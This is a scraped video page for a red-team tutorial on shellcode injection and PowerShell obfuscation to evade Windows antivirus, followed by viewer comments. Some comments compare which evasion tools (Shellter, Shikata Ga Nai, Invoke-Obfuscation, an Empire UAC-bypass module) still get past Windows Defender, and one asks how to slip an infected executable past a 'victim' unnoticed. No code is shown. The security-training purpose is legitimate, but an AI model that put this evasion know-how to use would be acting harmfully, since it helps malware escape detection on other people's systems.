Windows Red Team - Dynamic Shellcode Injection & PowerShell Obfuscation

Рет қаралды 25,874

Жыл бұрын

In this video, I will be exploring the process of dynamically injecting Shellcode into portable executables and PowerShell obfuscation for the purpose of defense evasion on Windows.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.
Writeup: hackersploit.org/windows-red-...
//PLATFORMS
BLOG ►► bit.ly/3qjvSjK
FORUM ►► bit.ly/39r2kcY
ACADEMY ►► bit.ly/39CuORr
//SOCIAL NETWORKS
TWITTER ►► bit.ly/3sNKXfq
DISCORD ►► bit.ly/3hkIDsK
INSTAGRAM ►► bit.ly/3sP1Syh
LINKEDIN ►► bit.ly/360qwlN
PATREON ►► bit.ly/365iDLK
MERCHANDISE ►► bit.ly/3c2jDEn
//BOOKS
Privilege Escalation Techniques ►► amzn.to/3ylCl33
Docker Security Essentials (FREE) ►► bit.ly/3pDcFuA
//SUPPORT THE CHANNEL
NordVPN Affiliate Link (73% Off) ►► bit.ly/3DEPbu5
Get $100 In Free Linode Credit ►► bit.ly/39mrvRM
Get started with Intigriti: go.intigriti.com/hackersploit
//CYBERTALK PODCAST
Spotify ►► spoti.fi/3lP65jv
Apple Podcasts ►► apple.co/3GsIPQo
//WE VALUE YOUR FEEDBACK
We hope you enjoyed the video and found value in the content. We value your feedback, If you have any questions or suggestions feel free to post them in the comments section or contact us directly via our social platforms.
//THANK YOU!
Thanks for watching!
Благодарю за просмотр!
Kiitos katsomisesta
Danke fürs Zuschauen!
感谢您观看
Merci d'avoir regardé
Obrigado por assistir
دیکھنے کے لیے شکریہ
देखने के लिए धन्यवाद
Grazie per la visione
Gracias por ver
شكرا للمشاهدة
-----------------------------------------------------------------------------------
#redteaming #cybersecurity #pentesting

Пікірлер: 63

@RealCyberCrime Жыл бұрын

you're killing it with this content Hackersploit, please upload more!! I've only seen a few of the red team videos but will def be watching more

@fabricenade9982 Жыл бұрын

The videos of HackerSploit are always Masterclass 💪. The Explanations are perfectly clear. Just MASTERCLASS.

@baidysall9591 Жыл бұрын

Awesome video. Always providing great content…. Merry Christmas 🎉

@ilbona87 Жыл бұрын

I recently finished the PTSv2 course, you're a phenomenal teacher!

@Nikita-sj8og Жыл бұрын

Can you please give the link of same ?

@ilbona87 Жыл бұрын

@@Nikita-sj8og It's hosted on the INE platform, you need to purchase at least a monthly subscription to take the course.

@ragnarok55 Жыл бұрын

Where can you finish that course He is ine platform instructor or not

@torsec6048 Жыл бұрын

happy too see you after a long time

@korovamilkplus Жыл бұрын

Alexis, first of all I want to thank you for this fantastic Red Team Fundamentals course! I've done some testing, and unfortunately, despite the video being recent, almost none of the AV evasion techniques work: 1) Invoke-Obfuscation is the only technique that works. 2) Shellter is immediately detected, both with new versions of WinRar (32bit) and with older versions. 3) Shikata Ga Nai is not detected by Windows Defender using 45 iterations, but the listener does not receive the reverse connection. I tried Shikata Ga Nai with different payloads created with MSFVenom, and with different iterations, but either it is detected or it does not make the reverse connection. 4) In no case was I able to obscure a reverse shell created with MSFVenom. The tests were all conducted with Windows Defender on Windows 10 (64bit) in my laboratory. If you have time and desire, you could update the obfuscation techniques by perhaps deepening the topic. In any case, thanks as always, you're the best cybersecurity teacher. See you soon.

@korovamilkplus Жыл бұрын

UPDATE: Invoke-Obfuscation also works with PowerShell Empire (the CSharp payload is not detected). Unfortunately, the /powershell/privesc/bypassuac module does not work with PowerShell Empire (it is detected, both with obfuscation and without), despite working perfectly with Metasploit.

@DopeForJesus Жыл бұрын

This is top notch material.

@kmengkomsot1479 Жыл бұрын

thank you hackersploit 😍😍

@zarandija Жыл бұрын

15'56'' You are fantestic....great video!!!!!

@parkour.11parkour58 Жыл бұрын

Gonna watch all your videos and comment after watching them

@hackproof1 Жыл бұрын

Finally… welcome back

@jamesparker5776 Жыл бұрын

good to see you sir

@NightMaRe-xl9tr Жыл бұрын

best hacking content ever 👍💯 , keep up the good work

@byronshepherd8415 Жыл бұрын

Welcome back!

@Funnnnboyy Жыл бұрын

Welcome back 🎉

@arupsen121 Жыл бұрын

After a long time came with the video.alex my favourite mentor . Can I request any video topics?

@netstreamer 11 ай бұрын

These videos are great! One question though. Even if you evade the av won't the continuously running command prompt window in the background tip the blue team off?

@mynealways509 Жыл бұрын

Pretty hard to keep a good man down... Welcome Back HS...

@HCKP 11 ай бұрын

I am a big fan of youuuuuu

@gianlucasanfilippo4669 11 ай бұрын

Great video. But I have a question: following all the steps, I get the infected executable file of winrar, but in my case then windows defender detects it , I just pass it on the victim target. How can I avoid it?Thanks

@greyhatsecurity Жыл бұрын

yaaaay!!!!! its been a while

@ajoyjohn1487 Жыл бұрын

best vdo

@onlinewebsites3476 Жыл бұрын

Yo finally !

@rishabhrana3773 Жыл бұрын

Welcome back sir

@HackerSploit Жыл бұрын

Return of the Mack! good to be back.

@rishabhrana3773 Жыл бұрын

@@HackerSploit yes sir today i was watching your video thinking for new video

@Tathamet Жыл бұрын

awesome thanks! but most EDR's today are really good at stopping shellter from my experience

@GliddingHippo Жыл бұрын

can you help me .I cant install powershell it says "Package 'powershell' has no installation candidate"

@rishabhrana3773 Жыл бұрын

As usual great video. How many videos will come in this series

@HackerSploit Жыл бұрын

Will share the outline in a separate video/live stream.

@jordanyoung1836 Жыл бұрын

Hi...I'm jordan and I'm new to the channel

@xsTaoo Жыл бұрын

Input "sudo wine shellter.exe" prompt "wine: could not load kernel32.dll, status c0000135", what should I do?

@passaronegro349 Жыл бұрын

We follow your channel here in Brazil,,🇧🇷✨ if possible put subtitles in your videos !!!!

@daljeetbhati8353 Жыл бұрын

Is this part of red teaming fundamental series part

@torsec6048 Жыл бұрын

long time no see alexis

@user-vu6fy6jm9r 8 ай бұрын

My regards, brother! Is it possible to recover some photos that I had sent via messenger on a Facebook account that I deleted at the beginning of the year. The person I sent them to was automatically deleted from their inbox when my account was deleted?

@r.e.d2016 Жыл бұрын

Hello Hackersploit. Can You Help Me ?. I Am interesting in Cybersecuirty. Which Books Can You Recommend To Me ?. Which Books Should l Read ?

@alwan7777 Жыл бұрын

pleseee review HavocFramework

@jordanyoung1836 Жыл бұрын

How is it going?

@ragnarok55 Жыл бұрын

My request please kindly explain ISO 27001 because every cyber security job asking this

@harshgupta1911 Жыл бұрын

Hlo sir i am from India 🙏🏻 Plz would u help me how would i start my journey in cybersec field

@RealCyberCrime Жыл бұрын

I work as a blue teamer at my job, but love seeing on the other side of the fence. You will not evade my defenses >:)

@HackerSploit Жыл бұрын

I can try :)

@16saalkanigga Жыл бұрын

**Video idea** Show some offensive example of chatgpt How pentester can use it? How will it affect cybersecurity field? Will ai take cybersecurity job in near future?